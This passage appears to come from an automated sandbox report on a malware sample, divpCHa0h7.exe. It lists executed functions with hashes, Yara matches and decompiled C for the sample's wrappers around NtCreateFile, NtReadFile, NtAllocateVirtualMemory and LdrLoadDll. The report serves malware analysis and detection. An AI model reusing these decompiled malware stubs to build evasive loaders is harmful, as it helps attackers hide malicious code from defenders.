                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 04F90D1D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: dc6e7e5d2ae436586350fb5dd6ff65feea60af2c9efb6e779196a87724b7bfef
                                                    • Instruction ID: ea4339e83c29c09a443c3a06146a76e6d710a768c5d730977622313bc1676c54
                                                    • Opcode Fuzzy Hash: dc6e7e5d2ae436586350fb5dd6ff65feea60af2c9efb6e779196a87724b7bfef
                                                    • Instruction Fuzzy Hash: AB1133B58002498FDB20CF99D484BDEFBF8EB48324F24841AE929A7300C774A941CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106A4B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A516
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 26a4d94c5bcb03906b9d07fc2a59e560896bffccfbfe9c5403cc766d72c3b524
                                                    • Instruction ID: 12236e98c5debf60e0bb1183b3249b1ee787124a3953d98dd7ad99903f97255c
                                                    • Opcode Fuzzy Hash: 26a4d94c5bcb03906b9d07fc2a59e560896bffccfbfe9c5403cc766d72c3b524
                                                    • Instruction Fuzzy Hash: 6E1113B1D003498FDB20DF9AC444BDEFBF8EB88224F14841AD469B7200C374A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04F90CC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 04F90D1D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: aa5f8b762db7609bc355bf9bd32e7dd98aaf0397f4943fec09f412236530f8d2
                                                    • Instruction ID: 126a6d000aa597691bf37f1ac7b5dd5170cb60d3647d76e72537ebad6009f901
                                                    • Opcode Fuzzy Hash: aa5f8b762db7609bc355bf9bd32e7dd98aaf0397f4943fec09f412236530f8d2
                                                    • Instruction Fuzzy Hash: 1E1100B58002499FDB20CF99D588BDEFBF8EB48324F24841AE915A3300C774A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0106F298, Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06d01f5604b93e696f7ffe703d501f78f5820792a787d3aa1b0b8dd58a6ded4c
                                                    • Instruction ID: 7ac093b107972094ec58b9dd1dd94f695adaa623275430788a8be5ab218afa2f
                                                    • Opcode Fuzzy Hash: 06d01f5604b93e696f7ffe703d501f78f5820792a787d3aa1b0b8dd58a6ded4c
                                                    • Instruction Fuzzy Hash: B012E5F9C917468AD312DF65F8981897BA1F746328BD06A0CC2613AAE1D7BC117ECF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106D064, Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e11d3035f5cd488fb6ab57c5686bbcafadfe1c9d43136070466c563da91a8bd
                                                    • Instruction ID: 889cb9b550320d76e88f43552508d89c295a52a68d5da8dadc7777304d261a8c
                                                    • Opcode Fuzzy Hash: 4e11d3035f5cd488fb6ab57c5686bbcafadfe1c9d43136070466c563da91a8bd
                                                    • Instruction Fuzzy Hash: 1DA19B36E0071ADFCF05CFA5C8445DEBBF6FF88300B1585AAE945AB220EB71A955CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106F296, Relevance: .2, Instructions: 217COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2de5c8ccf4068a82bd74d050fd76be00ee0073dd2fd04cfa0a2858916105c1e1
                                                    • Instruction ID: ccf99120f7ae02e64a77cfa0f53d062cae70823d421ee7b64afd31ddfabbe6ef
                                                    • Opcode Fuzzy Hash: 2de5c8ccf4068a82bd74d050fd76be00ee0073dd2fd04cfa0a2858916105c1e1
                                                    • Instruction Fuzzy Hash: 49C146B9C917468AD712DF65F8881897B61FB9A328F905A0CD1213BAD1D7BC107ECF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: divpCHa0h7.exe PID: 2256 Parent PID: 3240 divpCHa0h7.exeCOMMON

                                                    Executed Functions

                                                    Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                                    0x004186a3
                                                    0x004186af
                                                    0x004186b7
                                                    0x004186bc
                                                    0x004186e5
                                                    0x004186e9

                                                    APIs
                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: A:A
                                                    • API String ID: 2738559852-2859176346
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041871A, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E0041871A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("repne daa");
				asm("in al, dx");
				asm("popad");
				asm("loope 0x35");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                    0x0041871a
                                                    0x0041871c
                                                    0x0041871d
                                                    0x0041871e
                                                    0x00418723
                                                    0x00418726
                                                    0x0041872f
                                                    0x00418737
                                                    0x00418745
                                                    0x00418749

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                                    • Instruction ID: 9a256857486c6b04dc2d8d01bbab50f47954425687f1d86c7330f0437a7ebe71
                                                    • Opcode Fuzzy Hash: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                                    • Instruction Fuzzy Hash: E5014876200208BBDB14DF99CC85EEB77A9EF88314F118559BA18AB242C630E9548BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409B50(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;

				_t32 = __esi;
				_t31 = __edi;
				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t34 = _t33 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t35 = _t34 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620(__ebx,  &_v12, 0);
						_t35 = _t35 + 8;
					}
					_t18 = E00419730(_t31, _t32, _v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}















                                                    0x00409b50
                                                    0x00409b50
                                                    0x00409b6c
                                                    0x00409b6f
                                                    0x00409b74
                                                    0x00409b79
                                                    0x00409b83
                                                    0x00409b88
                                                    0x00409b8b
                                                    0x00409b8d
                                                    0x00409b95
                                                    0x00409b9a
                                                    0x00409b9a
                                                    0x00409ba1
                                                    0x00409ba9
                                                    0x00409bac
                                                    0x00409bae
                                                    0x00409bc2
                                                    0x00000000
                                                    0x00409bc4
                                                    0x00409bca
                                                    0x00409b7e
                                                    0x00409b7e
                                                    0x00409b7e

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004185EB, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004185EB(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t27;
				void* _t38;

				_t21 = _a4;
				_t6 = _t21 + 0xc40; // 0xc40
				E004191F0(_t38, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t27 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t27;
			}






                                                    0x004185f3
                                                    0x004185ff
                                                    0x00418607
                                                    0x0041863d
                                                    0x00418641

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                                    • Instruction ID: eadccef6660383827a1c39e062733e9e7291f8de244501940662f3f68da9609a
                                                    • Opcode Fuzzy Hash: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                                    • Instruction Fuzzy Hash: B501AFB2245108AFCB08CF99DC95EEB77A9AF8C354F158248FA1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                    0x004185ff
                                                    0x00418607
                                                    0x0041863d
                                                    0x00418641

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004187CA(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;
				void* _t28;

				_t13 = _a4;
				_t4 = _t13 + 0xc60; // 0xca0
				E004191F0(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                                                    0x004187d3
                                                    0x004187df
                                                    0x004187e7
                                                    0x00418809
                                                    0x0041880d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                                    • Instruction ID: baafc16d0dcc65a97a2a7081ec653fa0cdbc2bd5867fea8e6554ff1b4ee91aef
                                                    • Opcode Fuzzy Hash: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                                    • Instruction Fuzzy Hash: B9F08CB2200108AFDB14DF88CC80EEB73ACFF88304F108149FE4997241C630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x004187df
                                                    0x004187e7
                                                    0x00418809
                                                    0x0041880d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                    0x00418723
                                                    0x00418726
                                                    0x0041872f
                                                    0x00418737
                                                    0x00418745
                                                    0x00418749

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: dd47d7c6ff9d2967746e5dbd451d40e03d01ea8ebd275c0750facd0dfd7e8d3f
                                                    • Instruction ID: 9c977de8e498fddf620cab440f10a8c14ce3dbc7f66f137b128d0b4a7d9e86fe
                                                    • Opcode Fuzzy Hash: dd47d7c6ff9d2967746e5dbd451d40e03d01ea8ebd275c0750facd0dfd7e8d3f
                                                    • Instruction Fuzzy Hash: FD900261B0100902D201715A4404616100A97D0381F91C032A1015555FCE658992F171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bac412cc1dfe713b9de87026e7e6a89df14211377423f6cc97373e64437bba18
                                                    • Instruction ID: 9acea7047c9ce534738556313e3de75183f71b05966573b9287cc56cbd04eb0b
                                                    • Opcode Fuzzy Hash: bac412cc1dfe713b9de87026e7e6a89df14211377423f6cc97373e64437bba18
                                                    • Instruction Fuzzy Hash: 2C90027170100813D211615A4504707100997D0381F91C422A0415558EDA968952F161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: afd11a986fd75c76d5f2d470c17d4eb29bae97ee1fb367dd95169c25b93e4d55
                                                    • Instruction ID: b3140bf9d755b01c7184775adb463ac860d5039c652b6b3739495c669a65c018
                                                    • Opcode Fuzzy Hash: afd11a986fd75c76d5f2d470c17d4eb29bae97ee1fb367dd95169c25b93e4d55
                                                    • Instruction Fuzzy Hash: 0D900261742045529645B15A44045075006A7E0381791C022A1405950DC9669856F661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0dcfe0ebd91c8ee1dc12afdb7abf5c4e429660d19212ce4a94d03e85e3dfd99b
                                                    • Instruction ID: 69058d5e6e63e0ae3b03ccc44cf1429085394c903245383be6a5cc4205c68f66
                                                    • Opcode Fuzzy Hash: 0dcfe0ebd91c8ee1dc12afdb7abf5c4e429660d19212ce4a94d03e85e3dfd99b
                                                    • Instruction Fuzzy Hash: 8D9002A1702004038205715A4414616500A97E0341B51C031E1005590EC9658891B165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3b5dadc4a9406aa96a9bc3ab5a8fa43e16982621262e9db7e601447abd804d1a
                                                    • Instruction ID: d2ebbb9f7d992a8a6d6ebca30b791b51954625e087c4805e5c6387704afe9670
                                                    • Opcode Fuzzy Hash: 3b5dadc4a9406aa96a9bc3ab5a8fa43e16982621262e9db7e601447abd804d1a
                                                    • Instruction Fuzzy Hash: B99002A174100842D200615A4414B061005D7E1341F51C025E1055554ECA59CC52B166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1e2b5b332bf1258a1298d0c35329e6e3510c06b412279769b08ccc75d647cef8
                                                    • Instruction ID: 4b62ffd29c6225820d73440e3a015218c83c1011b8c38f970a82e0b3cd82e1f4
                                                    • Opcode Fuzzy Hash: 1e2b5b332bf1258a1298d0c35329e6e3510c06b412279769b08ccc75d647cef8
                                                    • Instruction Fuzzy Hash: 61900265711004034205A55A0704507104697D5391351C031F1006550DDA618861B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ec7c149e61107a3496ffd884b669a85d508fcb993016f245105f29f54d05b7d4
                                                    • Instruction ID: b7667a0f31afc59a84206bc139d811d5b9992506d5bc7413a236c7836deed88e
                                                    • Opcode Fuzzy Hash: ec7c149e61107a3496ffd884b669a85d508fcb993016f245105f29f54d05b7d4
                                                    • Instruction Fuzzy Hash: A49002B170100802D240715A4404746100597D0341F51C021A5055554FCA998DD5B6A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 640603656618f03567329130a61111bd16e2247b6296fb543ddbeecd273d7c2b
                                                    • Instruction ID: f785a899da0dfd0d7d06cb0fd14676072549c8e3f42a93ca2592413ccf5b622b
                                                    • Opcode Fuzzy Hash: 640603656618f03567329130a61111bd16e2247b6296fb543ddbeecd273d7c2b
                                                    • Instruction Fuzzy Hash: 3990027170108C02D210615A840474A100597D0341F55C421A4415658ECAD58891B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2ec1e25016675323297d7366fdef22abaaa63167c7271e7dc850ae1c7be19574
                                                    • Instruction ID: 47df8a1eee954c183b5fc413518c09b73ee94209ec7fb908501affe82e7ca2de
                                                    • Opcode Fuzzy Hash: 2ec1e25016675323297d7366fdef22abaaa63167c7271e7dc850ae1c7be19574
                                                    • Instruction Fuzzy Hash: 4B90027170100C02D280715A440464A100597D1341F91C025A0016654ECE558A59B7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f9c51aca9d722eb434e0b98e87d4fdd0f49f3cbce497cd88ed2ebba9e131c2e5
                                                    • Instruction ID: 71747927172317c530f959060f74489a338b672a147d66fdbe459349008bd736
                                                    • Opcode Fuzzy Hash: f9c51aca9d722eb434e0b98e87d4fdd0f49f3cbce497cd88ed2ebba9e131c2e5
                                                    • Instruction Fuzzy Hash: 3F90026171180442D300656A4C14B07100597D0343F51C125A0145554DCD558861B561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
